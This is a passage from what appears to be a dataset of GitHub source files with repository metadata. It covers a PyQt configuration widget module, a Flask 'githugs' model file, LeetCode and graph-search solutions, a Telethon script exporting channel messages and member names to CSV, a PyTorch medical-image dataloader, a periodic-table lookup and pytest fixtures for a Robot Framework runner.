-> None:\n \"\"\"\n When the EPICS widget is updated by the user, save the PV name.\n \"\"\"\n match_line_edit_text_width(self.epics_input, text=text, minimum=50, buffer=10)\n self.epics_input.setToolTip(text)\n self.dynamic_bridge.pvname.put(text.strip())\n\n def update_epics_preview(self) -> None:\n \"\"\"\n When the user asks for a new value, get a value from EPICS.\n \"\"\"\n # Prepare each time to get updated value\n def _prepare_value():\n value = self.dynamic_value.get()\n asyncio.run(value.prepare(DataCache()))\n self.epics_value_preview.setText(str(value.get()))\n if isinstance(value.get(), (float, int)):\n self._show_tol = True\n else:\n self._show_tol = False\n self.show_tolerance.emit(self._show_tol)\n self.refreshed.emit()\n\n def _handle_errors(ex: Exception):\n if isinstance(ex, DynamicValueError):\n QtWidgets.QMessageBox.warning(\n self,\n 'Failed to connect to PV',\n 'Unable to gather PV information for preview. '\n 'PV may not exist or be inaccessible',\n )\n else:\n raise ex\n\n if self._prep_dynamic_thread:\n if self._prep_dynamic_thread.isRunning():\n # TODO: Consider threadpools for this and other threading apps?\n for i in range(10):\n QTimer.singleShot(1, self.update_epics_preview)\n\n self._prep_dynamic_thread = ThreadWorker(_prepare_value)\n self._prep_dynamic_thread.error_raised.connect(_handle_errors)\n self._prep_dynamic_thread.start()\n\n def select_happi_cpt(self) -> None:\n \"\"\"\n When the user clicks on the happi device name, open the cpt chooser.\n Unlike other uses of this GUI, this one is used to select both the\n device and component all at once, since we can only have one\n target for the dynamic value.\n \"\"\"\n if self.happi_select_widget is None:\n widget = HappiDeviceComponentWidget(\n client=util.get_happi_client()\n )\n widget.item_search_widget.happi_items_selected.connect(\n self.new_happi_devices\n )\n widget.device_widget.attributes_selected.connect(\n self.new_happi_attrs\n )\n self.happi_select_widget = widget\n self.happi_select_widget.show()\n self.happi_select_widget.activateWindow()\n\n try:\n current_device = self.dynamic_value.get().device_name\n except AttributeError:\n return\n if current_device:\n self.happi_select_widget.item_search_widget.edit_filter.setText(\n current_device\n )\n\n def new_happi_devices(self, device_names: List[str]) -> None:\n \"\"\"\n Cache the name of the last device that was selected.\n The selection widget gives us a list, but we can only accept\n one item, so the first element is selected.\n \"\"\"\n if device_names:\n self._last_device_name = device_names[0]\n\n def new_happi_attrs(self, attr_names: List[OphydAttributeData]) -> None:\n \"\"\"\n Set the new happi device/attr on the dataclass and on the display.\n This takes the selection we just chose in the UI and also the\n cached device name.\n The selection widget gives us a list, but we can only accept\n one item, so the first element is selected.\n \"\"\"\n if attr_names:\n self.dynamic_bridge.device_name.put(self._last_device_name)\n self.dynamic_bridge.signal_attr.put(attr_names[0].attr)\n self.update_happi_text()\n\n def update_happi_text(self) -> None:\n \"\"\"\n Update the text on the happi selection button as appropriate.\n \"\"\"\n happi_value = self.dynamic_value.get()\n if happi_value is not None:\n if not happi_value.device_name or not happi_value.signal_attr:\n text = \"click to select\"\n else:\n text = f\"{happi_value.device_name}.{happi_value.signal_attr}\"\n self.happi_select_component.setText(text)\n self.happi_select_component.setToolTip(text)\n\n def update_happi_preview(self) -> None:\n \"\"\"\n When the user asks for a new value, query happi and make a device.\n \"\"\"\n def _prepare_value():\n value = self.dynamic_value.get()\n asyncio.run(value.prepare(DataCache()))\n self.happi_value_preview.setText(str(value.get()))\n if isinstance(value.get(), (float, int)):\n self._show_tol = True\n else:\n self._show_tol = False\n\n self.show_tolerance.emit(self._show_tol)\n self.refreshed.emit()\n\n def _handle_errors(ex: Exception):\n if isinstance(ex, DynamicValueError):\n QtWidgets.QMessageBox.warning(\n self,\n 'Failed to connect to device',\n 'Unable to gather information from happi device for preview. '\n 'Device might be unset or failed to connect',\n )\n else:\n raise ex\n\n if self._prep_dynamic_thread:\n if self._prep_dynamic_thread.isRunning():\n # TODO: Consider threadpools for this and other threading apps?\n for i in range(10):\n QTimer.singleShot(1, self.update_happi_preview)\n\n self._prep_dynamic_thread = ThreadWorker(_prepare_value)\n self._prep_dynamic_thread.error_raised.connect(_handle_errors)\n self._prep_dynamic_thread.start()\n\n def set_mode_from_data(self) -> None:\n \"\"\"\n Set the expected mode from the current data.\n \"\"\"\n mode = None\n dynamic = self.dynamic_value.get() # get from QDataclassBridge\n if dynamic is not None:\n if isinstance(dynamic, EpicsValue):\n mode = EditMode.EPICS\n elif isinstance(dynamic, HappiValue):\n mode = EditMode.HAPPI\n else:\n raise TypeError(\n f\"Unexpected dynamic value {dynamic}.\"\n )\n\n # prepare dynamic value\n def prep_dynamic_value() -> Any:\n try:\n asyncio.run(dynamic.prepare(DataCache()))\n except DynamicValueError as ex:\n logger.warning('Unable to prepare dynamic value during '\n f'input widget initialization: {ex}')\n self.set_mode(EditMode.STR)\n return\n self.set_mode(mode)\n\n self.prep_dynamic_thread = ThreadWorker(prep_dynamic_value)\n self.prep_dynamic_thread.start()\n else:\n static = self.value.get()\n if isinstance(static, bool):\n mode = EditMode.BOOL\n elif isinstance(static, float):\n mode = EditMode.FLOAT\n elif isinstance(static, int):\n mode = EditMode.INT\n elif isinstance(static, str):\n self.setup_enums(set_mode=True)\n return\n elif static is None:\n if self._is_number:\n mode = EditMode.INT\n else:\n mode = EditMode.STR\n else:\n raise TypeError(\n f\"Unexpected static value {static}\"\n )\n\n self.set_mode(mode)\n\n def setup_enums(self, set_mode: bool = False) -> None:\n \"\"\"\n Get enum strings and populate enum combo\n if enums are found, sets the mode to enum\n \"\"\"\n self.enum_input.clear()\n\n self.ids = self.id_fn()\n if self.ids is None:\n # no identifiers... nothing to do, but this shouldn't happen\n return\n if self.devices is None:\n # Collect signals from ids as pv names\n # self.ids: List[str]\n signal_cache = get_signal_cache()\n sigs: List[EpicsSignalRO] = []\n for id in self.ids:\n sigs.append(signal_cache[id])\n\n else:\n # Collect signals from ids as device attrs\n # self.ids: List[Tuple[str, str]] (device, attr)\n device_names = self.devices\n devices = []\n for device_name in device_names:\n try:\n devices.append(util.get_happi_device_by_name(device_name))\n except MissingHappiDeviceError as ex:\n logger.debug(f'Device missing in enum value setup: {ex}')\n continue\n sigs: List[EpicsSignal] = []\n for dev, attr in self.ids:\n for device in devices:\n try:\n sig = getattr(device, attr)\n except AttributeError:\n continue\n else:\n sigs.append(sig)\n\n enums_in_order = []\n\n def get_signal_enums():\n start = time.monotonic()\n for sig in sigs:\n try:\n sig.wait_for_connection(timeout=1)\n except TimeoutError:\n pass\n if time.monotonic() - start >= 1:\n break\n\n enum_set = set()\n for sig in sigs:\n if sig.enum_strs is not None:\n for enum_str in sig.enum_strs:\n if enum_str not in enum_set:\n enum_set.add(enum_str)\n enums_in_order.append(enum_str)\n\n def fill_enums():\n for text in enums_in_order:\n self.enum_input.addItem(text)\n value = str(self.value.get())\n if value in enums_in_order:\n self.enum_input.setCurrentText(value)\n\n if set_mode:\n if enums_in_order:\n self.set_mode(EditMode.ENUM)\n else:\n self.set_mode(EditMode.STR)\n\n self.thread_worker = BusyCursorThread(func=get_signal_enums)\n self.thread_worker.task_finished.connect(fill_enums)\n self.thread_worker.start()\n\n def set_mode(self, mode: EditMode, *args, **kwargs) -> None:\n \"\"\"\n Change the mode of the edit widget.\n This adjusts the dynamic data classes as needed and\n shows only the correct edit widget.\n \"\"\"\n # Hide all the widgets\n self.epics_widget.hide()\n self.happi_widget.hide()\n self.bool_input.hide()\n self.enum_input.hide()\n self.float_input.hide()\n self.int_input.hide()\n self.str_input.hide()\n if mode == EditMode.EPICS:\n if not isinstance(self.dynamic_value.get(), EpicsValue):\n self.dynamic_value.put(EpicsValue(pvname=\"\"))\n self.dynamic_bridge = QDataclassBridge(self.dynamic_value.get())\n self.epics_input.setText(self.dynamic_bridge.pvname.get())\n self.epics_widget.show()\n elif mode == EditMode.HAPPI:\n if not isinstance(self.dynamic_value.get(), HappiValue):\n self.dynamic_value.put(\n HappiValue(device_name=\"\", signal_attr=\"\")\n )\n self.dynamic_bridge = QDataclassBridge(self.dynamic_value.get())\n self.update_happi_text()\n self.happi_widget.show()\n else:\n self.dynamic_value.put(None)\n self.dynamic_bridge = None\n if mode == EditMode.BOOL:\n self.bool_input.setCurrentIndex(int(bool(self.value.get())))\n self._show_tol = False\n self.bool_input.show()\n elif mode == EditMode.ENUM:\n self.setup_enums()\n self._show_tol = False\n self.enum_input.show()\n elif mode == EditMode.FLOAT:\n try:\n value = float(self.value.get())\n except (ValueError, TypeError):\n value = 0.0\n self._show_tol = True\n self.float_input.setValue(value)\n self.float_input.show()\n elif mode == EditMode.INT:\n try:\n value = int(self.value.get())\n except (ValueError, TypeError):\n value = 0\n self._show_tol = True\n self.int_input.setValue(value)\n self.int_input.show()\n elif mode == EditMode.STR:\n self._show_tol = False\n self.str_input.setText(str(self.value.get()))\n self.str_input.show()\n\n self.select_mode_button.setToolTip(\n f\"Current mode: {mode.name}\"\n )\n self.show_tolerance.emit(self._show_tol)\n\n\ndef disable_widget(widget: QWidget) -> QWidget:\n \"\"\" Disable widget, recurse through layouts \"\"\"\n # TODO: revisit, is there a better way to do this?\n for idx in range(widget.layout().count()):\n layout_item = widget.layout().itemAt(idx)\n if isinstance(layout_item, QLayout):\n disable_widget(layout_item)\n else:\n wid = layout_item.widget()\n if wid:\n wid.setEnabled(False)\n return widget\n\n\ndef gather_relevant_identifiers(\n comp: Comparison,\n group: Union[DeviceConfiguration, PVConfiguration, ToolConfiguration, SetValueStep]\n) -> list[str]:\n \"\"\"\n Gathers identifiers for ``comp`` from its parent ``group``. ``comp`` must\n be present in ``group``, else an empty list will be returned\n\n Identifiers are typically device+attribute pairs, or raw EPICS PVs\n\n This function will need to be updated when new configurations or steps are added\n\n Parameters\n ----------\n comp : Comparison\n the comparison in question\n group : Union[DeviceConfiguration, PVConfiguration]\n a configuration holding ``comp``\n\n Returns\n -------\n list[str]\n the identifiers related to ``comp``, or an empty list if none are found\n \"\"\"\n identifiers = []\n if isinstance(group, DeviceConfiguration):\n for device in group.devices:\n for attr, comparisons in group.by_attr.items():\n for comparison in comparisons + group.shared:\n if comparison == comp:\n identifiers.append((device, attr))\n elif isinstance(group, PVConfiguration):\n for pvname, comparisons in group.by_pv.items():\n for comparison in comparisons + group.shared:\n if comparison == comp:\n identifiers.append(pvname)\n elif isinstance(group, ToolConfiguration):\n for result_key, comparisons in group.by_attr.items():\n for comparison in comparisons + group.shared:\n if comparison == comp:\n identifiers.append(result_key)\n elif isinstance(group, SetValueStep):\n for check in group.success_criteria:\n if check.comparison == comp:\n signal = check.to_signal()\n if signal:\n identifiers.append(signal.pvname)\n\n return identifiers\n","repo_name":"pcdshub/atef","sub_path":"atef/widgets/config/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":73440,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"2629000293","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport time\nfrom flask import url_for\nfrom flaskext.mail.message import Message\nfrom mongoengine import fields, Document\nfrom mongoengine.queryset import QuerySet\n\n\ndef get_week_number(when=None):\n if not when:\n when = datetime.date.today()\n return when.isocalendar()[1]\n\ndef get_year_number(when=None):\n if not when:\n when = datetime.date.today()\n return when.isocalendar()[0]\n\ndef get_day_number(when=None):\n if not when:\n when = datetime.date.today()\n return when.isocalendar()[2]\n\n\nclass UserQuerySet(QuerySet):\n def total_hugs(self):\n return self.sum('hugs_received')\n\n def average_hugs_given(self):\n return self.filter(hugs_given__gt=0).average('hugs_given')\n\n def average_hugs_received(self):\n return self.filter(hugs_received__gt=0).average('hugs_received')\n\n\nclass User(Document):\n name = fields.StringField(unique=True, unique_with='network')\n network = fields.StringField(default='github')\n access_token = fields.StringField(required=False)\n is_admin = fields.BooleanField(default=False)\n hugs_received = fields.IntField(default=0)\n hugs_given = fields.IntField(default=0)\n avatar_url = fields.StringField(required=False)\n notifications = fields.BooleanField(default=False)\n email = fields.EmailField(required=False)\n\n meta = {'queryset_class': UserQuerySet}\n\n def __unicode__(self):\n return self.name\n\n @property\n def url(self):\n return url_for('user', username=self.name, network=self.network)\n\n @property\n def network_url(self):\n return getattr(self, '%s_url' % self.network)\n\n @property\n def github_url(self):\n return 'https://github.com/%s' % self.name\n\n def can_hug(self):\n return self.get_today_hugged() is None\n\n def hug(self, receiver):\n hug = Hug.objects.create(hugger=self, hugged=receiver)\n self.hugs_given += 1\n self.save()\n receiver.hugs_received += 1\n receiver.save()\n return hug\n\n def get_today_hugged(self):\n try:\n return Hug.objects.get(hugger=self, week=get_week_number(), year=get_year_number(), day=get_day_number())\n except Hug.DoesNotExist:\n return None\n\n def get_this_week_hugged(self):\n try:\n return Hug.objects.get(hugger=self, week=get_week_number(), year=get_year_number())\n except Hug.DoesNotExist:\n return None\n\n def get_this_week_hugged_by(self):\n return Hug.objects.filter(hugged=self, week=get_week_number(), year=get_year_number())\n\n def get_unsubscribe_token(self):\n from app import signer\n return signer.dumps({'name': self.name, 'network': self.network, 'action': 'unsubscribe'})\n\n def to_dict(self, follow=False):\n data = {\n 'name': self.name,\n 'network': self.network,\n 'hugs_received': self.hugs_received,\n 'hugs_given': self.hugs_given,\n 'avatar_url': self.avatar_url,\n 'url': self.url,\n }\n if follow:\n data['hugs'] = [hug.to_dict(False) for hug in Hug.objects.filter(hugger=self).select_related()]\n return data\n\n\nclass HugQuerySet(QuerySet):\n def hugs_this_week(self):\n return self.filter(week=get_week_number(), year=get_year_number()).count()\n\n def hugs_last_week(self):\n last_week = datetime.date.today() - datetime.timedelta(days=7)\n return self.filter(week=get_week_number(last_week), year=get_year_number(last_week)).count()\n\n def get_recent(self, num):\n return self.order_by('-created').limit(num)\n\n\nclass Hug(Document):\n hugger = fields.ReferenceField(User, unique_with=['year', 'week', 'day'])\n hugged = fields.ReferenceField(User)\n created = fields.DateTimeField(default=datetime.datetime.now)\n week = fields.IntField(default=get_week_number)\n year = fields.IntField(default=get_year_number)\n day = fields.IntField(default=get_day_number)\n\n meta = {'queryset_class': HugQuerySet}\n\n def __unicode__(self):\n return u'%s -> %s' % (self.hugger, self.hugged)\n\n def notify_receiver(self):\n \"\"\"\n Notify the receiver\n \"\"\"\n from app import mail\n body = \"\"\"Hi %(hugged)s,\n\n You've just been hugged by %(hugger)s on https://www.githugs.org.\n\n Your GitHugs team.\n\n PS: If you don't want these notifications, click %(unsubscribe_url)s\"\"\" % {\n 'hugged': self.hugged,\n 'hugger': self.hugger,\n 'unsubscribe_url': 'https://www.githugs.org%s' % url_for('unsubscribe', token=self.hugged.get_unsubscribe_token())\n }\n message = Message(\n subject=\"You have been hugged\",\n sender=\"hugs@githugs.org\",\n recipients=[self.hugged.email],\n body=body,\n )\n mail.send(message)\n\n def to_dict(self, follow=False):\n data = {\n 'created': time.mktime(self.created.timetuple()),\n 'week': self.week,\n 'year': self.year,\n }\n if follow:\n data['hugger'] = self.hugger.to_dict()\n data['hugged'] = self.hugged.to_dict()\n else:\n data['hugger'] = self.hugger.name\n data['hugged'] = self.hugged.name\n return data\n","repo_name":"ojii/githug","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5332,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"57"} +{"seq_id":"70928124979","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : 20230213_1234. 替换子串得到平衡字符串.py\n# @Author: Lin\n# @Date : 2023/2/16 10:46\n\n# 有一个只含有 'Q', 'W', 'E', 'R' 四种字符,且长度为 n 的字符串。\n# 假如在该字符串中,这四个字符都恰好出现 n/4 次,那么它就是一个“平衡字符串”。\n# 给你一个这样的字符串 s,请通过“替换一个子串”的方式,使原字符串 s 变成一个“平衡字符串”。\n# 你可以用和“待替换子串”长度相同的 任何 其他字符串来完成替换。\n# 请返回待替换子串的最小可能长度。\n# 如果原字符串自身就是一个平衡字符串,则返回 0。\n# 示例 1:\n# 输入:s = \"QWER\"\n# 输出:0\n# 解释:s 已经是平衡的了。\n# 示例 2:\n# 输入:s = \"QQWE\"\n# 输出:1\n# 解释:我们需要把一个 'Q' 替换成 'R',这样得到的 \"RQWE\" (或 \"QRWE\") 是平衡的。\n# 示例 3:\n# 输入:s = \"QQQW\"\n# 输出:2\n# 解释:我们可以把前面的 \"QQ\" 替换成 \"ER\"。\n# 示例 4:\n# 输入:s = \"QQQQ\"\n# 输出:3\n# 解释:我们可以替换后 3 个 'Q',使 s = \"QWER\"。\n# 提示:\n#\n# 1 <= s.length <= 10^5\n# s.length 是 4 的倍数\n# s 中只含有 'Q', 'W', 'E', 'R' 四种字符\nfrom collections import Counter\n\n\nclass Solution:\n def balancedString(self, s: str) -> int:\n cnt = Counter(s)\n partial = len(s) // 4\n def check():\n if cnt['Q'] > partial or \\\n cnt['W'] > partial or \\\n cnt['E'] > partial or \\\n cnt['R'] > partial:\n return False\n return True\n\n if check():\n return 0\n r = 0\n ans = len(s)\n for i, v in enumerate(s):\n while r < len(s) and not check():\n cnt[s[r]] -= 1\n r += 1\n print(cnt, i, r)\n\n if not check():\n break\n ans = min(ans, r - i)\n cnt[v] += 1\n return ans\n\n\ns = Solution()\ns.balancedString(s = \"QQQW\")","repo_name":"L316645200/LeetCode","sub_path":"LeetCode/每日一题/2023/20230213_1234. 替换子串得到平衡字符串.py","file_name":"20230213_1234. 替换子串得到平衡字符串.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"6232171840","text":"import os\r\nimport pandas as pd\r\nfrom telethon import TelegramClient\r\nfrom telethon.tl.functions.messages import SendMessageRequest\r\nfrom telethon.tl.functions.channels import GetParticipantsRequest\r\nfrom telethon.tl.types import ChannelParticipantsSearch\r\n\r\n#(https://my.telegram.org/auth?to=apps) register your number and get keys and hash\r\n#when the client starts it demands mobile number Format(+(country_code)(yoiur mobile number)). After that enter the otp code\r\napi_id = ''#put id and remove inverted commas\r\napi_hash = ''#put api hash in inverted commas\r\nclient = TelegramClient('sess_name', api_id, api_hash)\r\nclient.start()\r\n \r\ndef getChats(channel_name):\r\n\r\n schat=[]\r\n chat_hist = client.get_messages(str(channel_name),100)\r\n for i in range(len(chat_hist)):\r\n if chat_hist[i].to_dict()['_'] == 'Message':\r\n temp = chat_hist[i].to_dict()\r\n list1=[]\r\n list1.append(temp['date'])\r\n list1.append(temp['from_id'])\r\n list1.append(temp['id'])\r\n list1.append(temp['message'])\r\n list1.append(temp['reply_to_msg_id'])\r\n list1.append(temp['via_bot_id'])\r\n schat.append(list1)\r\n return schat\r\n \r\ndef getParticipants(channel_name):\r\n \r\n spart=[]\r\n total_participants = client.get_participants(str(channel_name),aggressive=True)\r\n for i in range(len(total_participants)):\r\n if total_participants[i].to_dict()['_'] == 'User':\r\n temp = total_participants[i].to_dict()\r\n tlist=[]\r\n tlist.append(temp['username'])\r\n tlist.append(temp['first_name'])\r\n tlist.append(temp['last_name'])\r\n spart.append(tlist)\r\n return spart\r\n \r\ndef getParticipantInfo(id):\r\n \r\n return client.get_entity(id).to_dict()\r\n \r\ndef sendMessage(name):\r\n \r\n client.send_message('Group_name',message='your_message')\r\n\r\nif __name__ == \"__main__\": \r\n #getting chats of that channel\r\n channel_name = str(input(\"Enter the channel name::::\"))\r\n chat = getChats(channel_name)\r\n #putting it in dataframe and get a csv file out of it\r\n col =['DateTime','From_Id(SendersId)','Message_id','Message','Reply_to_msg_id','Via_bot_id']\r\n chatDataFrame = pd.DataFrame(chat,columns=col)\r\n chatDataFrame.to_csv('Chats.csv',encoding='utf-8')\r\n \r\n #getting participants of that channel\r\n channel_name = str(input(\"Enter the channel name::::\"))\r\n part = getParticipants(channel_name)\r\n #putting it in dataframe and get a csv file out of it\r\n col1 =['Username','First_Name','Last_Name']\r\n partDataFrame = pd.DataFrame(part,columns=col1)\r\n partDataFrame.to_csv('Participants.csv',encoding='utf-8')\r\n \r\n #other functions can be called according to need(telegram_id is an integer)","repo_name":"jatin31/Telegram-Data-Fetch","sub_path":"FetchData.py","file_name":"FetchData.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"7593406123","text":"# from collections import deque\r\n# import sys\r\n# input = input\r\n\r\n# n, m = map(int, input().split())\r\n# mylist = [list(map(int, input().split())) for _ in range(m)]\r\n\r\n# nodes = [[0] for _ in range(n+1)]\r\n# for i in range(m):\r\n# [a, b] = mylist[i]\r\n# nodes[a].append(b)\r\n# nodes[b].append(a)\r\n\r\n# visited = [False]*(n+1)\r\n# visited[0] = True\r\n\r\n# count = 0\r\n# for n in range(1, n+1):\r\n# if visited[n] == True:\r\n# continue\r\n\r\n# count += 1\r\n# q = deque([])\r\n# q.append(n)\r\n# visited[n] = True\r\n\r\n# while q:\r\n# s = q.popleft()\r\n# visited[s] = True\r\n\r\n# for i in nodes[s]:\r\n# if visited[i] == False:\r\n# q.append(i)\r\n# visited[i] = True\r\n\r\n# print(count)\r\n\r\n\r\n\r\n### dfs 솔루션\r\n\r\nimport sys\r\ninput = sys.stdin.readline\r\nsys.setrecursionlimit(10**9)\r\n\r\nn, m = map(int,input().split())\r\narr = [[0]*(n+1) for i in range(n+1)]\r\nvisited = [False]*(n+1)\r\n\r\nfor i in range(m):\r\n a, b = map(int, input().split())\r\n arr[a][b] = 1\r\n arr[b][a] = 1\r\ncount=0\r\n\r\ndef dfs(s):\r\n visited[s] = True\r\n for i in range(1,n+1):\r\n if visited[i]==False and arr[s][i] == 1:\r\n dfs(i)\r\n\r\nfor i in range(1,n+1):\r\n if visited[i] == False:\r\n dfs(i)\r\n count+=1\r\nprint(count)","repo_name":"sangwoo-sean/Baekjoon","sub_path":"11724(연결요소개수)(넓이우선탐색, 깊이우선탐색).py","file_name":"11724(연결요소개수)(넓이우선탐색, 깊이우선탐색).py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"34603123149","text":"f = open('elements.txt','r')\r\na = [\"\"] * 118\r\nfor i in range(118): \r\n a[i] = [\"\"] * 3 \r\nfor i in range(118):\r\n s = f.readline().split(',')\r\n s1 = s[2]\r\n s2 = s1[0:-1]\r\n a[i][0] += s[0]\r\n a[i][1] += s[1]\r\n a[i][2] += s2\r\n\r\nf.close()\r\nwhile s!=\"\":\r\n s = input()\r\n try:\r\n \r\n x = int(s)\r\n \r\n if x>0 and x<119:\r\n x -=1\r\n print( a[x][1], a[x][2], a[x][0])\r\n else:\r\n print(\"Такого пока не нашли:(\")\r\n except ValueError:\r\n for i in range (118):\r\n if a[i][1]==s or a[i][2]==s:\r\n print(a[i][0], a[i][1], a[i][2])\r\n break \r\n \r\n print(\"Такого пока не нашли:(\")","repo_name":"Mr-Marlid/Python","sub_path":"Lab_12/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"9193681744","text":"import argparse\nimport logging\n\nimport torchvision\n\nimport nibabel as nib\n\nimport fnmatch\nimport os\nimport random\nimport shutil\nimport string\nimport time\nfrom abc import abstractmethod\nfrom collections import defaultdict\nfrom time import sleep\nimport torch\nimport cv2\n\nimport numpy as np\nfrom torch.utils.data import DataLoader, Dataset\nimport transforms\n\n# Deffine transforms for BRAIN and ABDOMEN scans\nBRAIN_DEFAULT_TRANSFORM = torchvision.transforms.Compose(\n [ \n torchvision.transforms.ToPILImage(),\n torchvision.transforms.Resize((128,128), interpolation=torchvision.transforms.InterpolationMode.BILINEAR),\n torchvision.transforms.ToTensor(),\n transforms.Scale(a=0, b=255, min_val=0, max_val=1), # Scale to [0, 1]\n transforms.Dequantize(), # Add U(0, 1) noise, becomes [0, 256]\n transforms.Scale(a=0, b=1, min_val=0, max_val=256), # Scale to [0, 1]\n ]\n )\n\nABDOM_DEFAULT_TRANSFORM = torchvision.transforms.Compose(\n [ \n torchvision.transforms.ToPILImage(),\n torchvision.transforms.Resize((256,256), interpolation=torchvision.transforms.InterpolationMode.BILINEAR),\n torchvision.transforms.ToTensor(),\n transforms.Scale(a=0, b=255, min_val=0, max_val=1), # Scale to [0, 1]\n transforms.Dequantize(), # Add U(0, 1) noise, becomes [0, 256]\n transforms.Scale(a=0, b=1, min_val=0, max_val=256), # Scale to [0, 1]\n ]\n )\n\nclass MOOD2dDataSet(Dataset):\n def __init__(\n self,\n root = \"\",\n transform=None,\n ):\n super().__init__()\n\n \"\"\"Dataset which loads 2D slices from a dir of NIFTI files.\n\n Args:\n base_dir ([str]): [Directory in which the nifti files are.]\n transforms ([type], optional): [Transformation to do after loading the dataset -> pytorch data transforms]. Defaults to None\n \"\"\"\n \n self.root = root\n self.transform = transform\n\n self.items = self.load_dataset(self.root)\n self.data_len = len(self.items)\n\n def __len__(self):\n return self.data_len\n\n def __getitem__(self, idx):\n data_smpl, fn = self.get_data_by_idx(idx)\n\n data_smpl = data_smpl.transpose(1,2,0)\n\n data_smpl = [self.transform(data_smpl[i]) for i in range(data_smpl.shape[0])]\n data_smpl = [torch.cat([data_smpl[i]]*3, dim=0) for i in range(len(data_smpl))]\n data_smpl = torch.stack(data_smpl, dim=0)\n \n return data_smpl, fn\n\n def get_data_by_idx(self, idx):\n \"\"\"Returns a data sample for a given index i.e., file path -> 3-D Numpy array DxHxW\n\n Args:\n idx ([int]): [Index of the data sample]\n\n Returns:\n [np.ndarray]: [3-D Numpy array DxHxW]\n \"\"\"\n\n file = self.items[idx]\n nifti = nib.load(file)\n np_data = nifti.get_fdata()\n np_data = np_data.astype(np.float16)\n \n\n # slice to get 1 slice \n return np_data.astype(np.float32), file\n \n\n def load_dataset(self, base_dir):\n \"\"\"Indexes all files in the given directory and returns a list of 2-D slices (file_index, npy_file, slice_index_for_np_file)\n (so they can be loaded with get_data_by_idx)\n\n Args:\n base_dir ([str]): [Directory in which the npy files are.]\n Returns:\n [list]: [List of file paths which should be used in the dataset]\n \"\"\"\n files = []\n all_files = os.listdir(base_dir)\n \n for i, filename in enumerate(sorted(all_files)):\n if not filename.endswith(\"nii.gz\"):\n continue\n\n n_file = os.path.join(base_dir, filename)\n files.append(n_file)\n \n return files\n \n\n\n\n ","repo_name":"rkharkness/mood","sub_path":"scripts/dataloaders.py","file_name":"dataloaders.py","file_ext":"py","file_size_in_byte":3814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"25957815406","text":"from pathlib import Path, PurePath\nfrom subprocess import run\nfrom typing import Any, List, Optional, Union\n\nimport pytest # type: ignore\n\nfrom parabot import parabot\n\n\n@pytest.fixture(\n scope=\"session\",\n params=[\n PurePath(\"examples/test_project_01/suite_01/suite.robot\"),\n PurePath(\"examples/test_project_02/suite_01\"),\n ],\n ids=[\"valid_path1\", \"valid_path2\"],\n)\ndef provide_valid_robot_filepath(request) -> Any:\n return request.param\n\n\n@pytest.fixture(\n scope=\"session\",\n params=[\n PurePath(\"examples/test_pro_01/suite_01/suite.robot\"),\n PurePath(\"examples/test_project_02/suite_0\"),\n ],\n ids=[\"invalid_path1\", \"invalid_path2\"],\n)\ndef provide_invalid_robot_filepath(request) -> Any:\n return request.param\n\n\n@pytest.fixture(scope=\"session\", params=[\"reg\", \"smoke\"])\ndef provide_valid_tag(request) -> str:\n return request.param\n\n\n@pytest.fixture(scope=\"session\", params=[\"regg\", \"smokes\"])\ndef provide_invalid_tag(request) -> str:\n return request.param\n\n\n@pytest.fixture(scope=\"session\")\ndef run_valid_path_worker(provide_valid_robot_filepath) -> Optional[int]:\n result: Optional[int] = parabot.path_worker(provide_valid_robot_filepath)\n return result\n\n\n@pytest.fixture(scope=\"session\")\ndef run_invalid_path_worker(provide_invalid_robot_filepath) -> Optional[int]:\n result: Optional[int] = parabot.path_worker(provide_invalid_robot_filepath)\n return result\n\n\n@pytest.fixture(scope=\"session\")\ndef run_valid_tag_worker(provide_valid_tag) -> Optional[int]:\n result: Optional[int] = parabot.tag_worker(provide_valid_tag)\n return result\n\n\n@pytest.fixture(scope=\"session\")\ndef run_invalid_tag_worker(provide_invalid_tag) -> Optional[int]:\n result: Optional[int] = parabot.tag_worker(provide_invalid_tag)\n return result\n\n\n@pytest.fixture(scope=\"session\")\ndef run_valid_pool_path_workers() -> Union[List[Optional[int]], int]:\n return parabot.pool_path_workers(\n parabot.path_worker,\n [\n Path(\"examples/test_project_01/suite_01/suite.robot\"),\n Path(\"examples/test_project_02/suite_01/suite.robot\"),\n ],\n timeout=60,\n )\n\n\n@pytest.fixture(scope=\"session\")\ndef run_timeout_pool_path_workers() -> Union[List[Optional[int]], int]:\n return parabot.pool_path_workers(\n parabot.path_worker,\n [\n Path(\"examples/test_project_01/suite_01/suite.robot\"),\n Path(\"examples/test_project_02/suite_01/suite.robot\"),\n ],\n timeout=5,\n )\n\n\n@pytest.fixture(scope=\"session\")\ndef run_valid_pool_tag_workers() -> List[Optional[int]]:\n return parabot.pool_tag_workers(parabot.tag_worker, [\"reg\", \"smoke\"])\n\n\n@pytest.fixture(\n scope=\"session\",\n params=[\n \"-a\",\n \"-f examples/test_project_01/suite_01 examples/test_project_02/suite_02\",\n \"-t reg smoke\",\n ],\n)\ndef run_e2e(request) -> Any:\n return run(\n f\"python3 -m parabot {request.param}\",\n check=True,\n shell=True,\n capture_output=True,\n )\n\n\nclass TestParabotWorkers:\n def test_path_worker_valid(self, run_valid_path_worker):\n status: Optional[int] = run_valid_path_worker\n assert status is None\n\n def test_path_worker_invalid(self, run_invalid_path_worker):\n status: Optional[int] = run_invalid_path_worker\n assert status == 1\n\n def test_tag_worker_valid(self, run_valid_tag_worker):\n status: Optional[int] = run_valid_tag_worker\n assert status is None\n\n def test_tag_worker_invalid(self, run_invalid_tag_worker):\n status: Optional[int] = 